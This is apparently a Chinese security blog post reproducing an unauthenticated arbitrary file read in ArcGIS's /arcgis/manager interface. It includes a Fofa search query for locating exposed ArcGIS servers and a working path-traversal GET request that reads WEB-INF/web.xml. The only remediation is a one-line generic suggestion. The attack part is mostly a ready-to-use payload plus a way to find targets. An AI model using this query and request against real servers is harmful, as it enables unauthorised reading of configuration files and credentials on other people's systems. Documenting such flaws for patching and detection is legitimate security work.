当前位置: 首页 > article >正文

ArcGIS地理空间平台 manager 任意文件读取漏洞复现

0x01 产品描述:

 ‌       ArcGIS‌是一个综合的地理空间平台,由Esri开发,旨在为专业人士和组织提供全面的地理信息系统(GIS)功能。ArcGIS通过集成和连接地理环境中的数据,支持创建、管理、分析、映射和共享各种类型的数据,从而帮助组织在决策制定中占据领先地位‌。
0x02 漏洞描述:

       ArcGIS地理空间平台 /arcgis/manager接口存在任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。
0x03 搜索语句:

Fofa:app="esri-ArcGIS"


0x04 漏洞复现:

GET /arcgis/manager/3370/js/../WEB-INF/web.xml HTTP/1.1
Host: your-ip


0x05 修复建议:

在处理客户端输入的参数时,进行严格的验证和过滤,防止未授权的文件访问。


http://www.kler.cn/a/384114.html

相关文章:

  • 代码随想录算法训练营Day55 | 图论理论基础、深度优先搜索理论基础、卡玛网 98.所有可达路径、797. 所有可能的路径、广度优先搜索理论基础
  • 【Spring Security】 Spring Security 使用案例详细教程
  • 【bug日志-水】解决本地开发下代理和url同名导致刷新404的问题
  • RabbitMQ 七种工作模式介绍
  • Java学习者的福音:SpringBoot教学辅助平台
  • 视频——教学篇——拍摄和剪辑
  • [C语言]strstr函数的使用和模拟实现
  • 《Java 实现堆排序:深入理解与代码剖析》
  • 如何选择适合的AWS EC2实例类型
  • VMWareTools安装及文件无法拖拽解决方案
  • SpringBoot之定时任务
  • 前端介绍|基础入门-html+css+js
  • Android View 的焦点控制基础
  • 【go从零单排】Strings and Runes 字符串和字符
  • 基于java+SpringBoot+Vue的宠物咖啡馆平台设计与实现
  • 进程和计划任务管理
  • MapReduce 的 Shuffle 过程
  • 基于matlab的人眼开度识别
  • 代码随想录 | Day38 | 动态规划 :01背包应用 目标和一和零
  • 【React.js】AntDesignPro左侧菜单栏栏目名称不显示的解决方案
  • 如何有效销售和应用低代码软件?探索其市场机会与策略
  • LabVIEW VISA通信常见问题
  • (三)使用Vite创建Vue项目,了解Vue3生命周期
  • MySQL如何实现PHP输入安全
  • PPT文件设置了修改权限,如何取消权?
  • 别名路径联想设置